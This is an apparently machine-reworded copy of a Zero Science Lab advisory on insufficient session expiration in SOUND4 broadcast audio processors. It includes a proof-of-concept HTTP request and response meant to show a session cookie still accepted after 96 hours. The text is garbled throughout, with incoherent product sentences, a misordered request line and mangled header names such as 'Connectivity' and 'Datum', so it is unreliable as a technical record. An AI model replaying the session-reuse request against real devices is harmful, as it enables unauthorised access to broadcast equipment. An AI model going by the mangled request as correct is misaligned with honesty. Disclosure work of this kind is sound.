SOUND4 IMPACT/FIRST/PULSE/Eco 2.x Insufficient Session Expiration

SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Insufficient Session Expiration

Vendor: SOUND4 Ltd.

Product web page: https://www.sound4.com | https://www.sound4.biz

Version affected: 4.1.102

Summary: SOUND4 IMPACT is an ingenious process that combines mono and stereo sound.

To achieve perfect stereo processing, each part of the signal is processed individually.

Consistency in both sound quality and level. In moving, you must be consistent in sound and level.

reception occurs when the FM receiver changes from mono to stereo and then back again

Stereo reduces the volume and sound variation by more than 90%.

Stereo expander is an option in the SOUND4-IMPACT processing chain

Basically, without limitations.

SOUND4 is a powerful and versatile product that offers advanced functionality.

PULSE offers clients the best price-performance ratio.

It is more than a processor. It is flexible and powerful.

Radio broadcasting standards are fully compatible with the sound quality of this product.

It can also be used for streaming, DAB and FM simultaneously.

SOUND4 FIRST offers all of the essential functions you require

High performance FM/HD processors.

Affordable. This product is designed to produce a high-quality sound.

This tool allows you to perform 2-band processing and a digital stereogenerator.

Clipper for IMPACT

Desc: This application experiences an insufficient session expiration. This

This happens when an attacker can reuse an old session through the web app

For authorization, session IDs or credentials are required. Session expiration not complete

Increases the vulnerability of your device to attack that could steal, or even reuse users’ data

Session identifiers

It was tested on Apache/2.4.25 (Unix).

OpenSSL/1.0.2k

PHP/7.1.1

GNU/Linux 5.10.43 (armv7l)

GNU/Linux 4.9.228 (armv7l)

Gjoko “LiquidWorm” Krstic discovered vulnerability

Macedonian Information Security Research and Development Laboratory

Zero Science Lab – https://www.zeroscience.mk – @zeroscience

ZSL-2022-5724) Advisory ID

Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5724.php

26.09.2022

—

After 96 hours, session valid

POST HTTP/1.1 /checklogin.php

Radio Host

Cookie: PHPSESSID=q9rooqkl3kl20aianmveimu23q; monitor-mp3-bitrate=128; monitor-volume=1; settings_accordion_active=3; netdiagsaccordion_last=0

Content-Length: 34

Sec-Ch-Ua: “Chromium”;v=”105″, “Not)A;Brand”;v=”8″

Accept: */*

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested with: XMLHttpRequest

Sec-Ch-Ua-Mobile: ?0

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36

Sec-Ch-Ua-Platform: “Windows”

Origin: https://RADIO

Sec-Fetch-Site: same-origin

Sec-Fetch Mode: Cors

Sec-Fetch – Dest: empty

Referer: https://RADIO/linkandshare.php

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connectivity: Close

session=q9rooqkl3kl20aianmveimu23q

HTTP/1.1 200 OK

Datum: Sat, February 3, 1970 at 11:13:19 GMT

Server: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1

X-Powered-By: PHP/7.1.1

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Vary: User-Agent

Content-Length: 1

Connectivity: Close

Content-Type: text/html; charset=UTF-8

0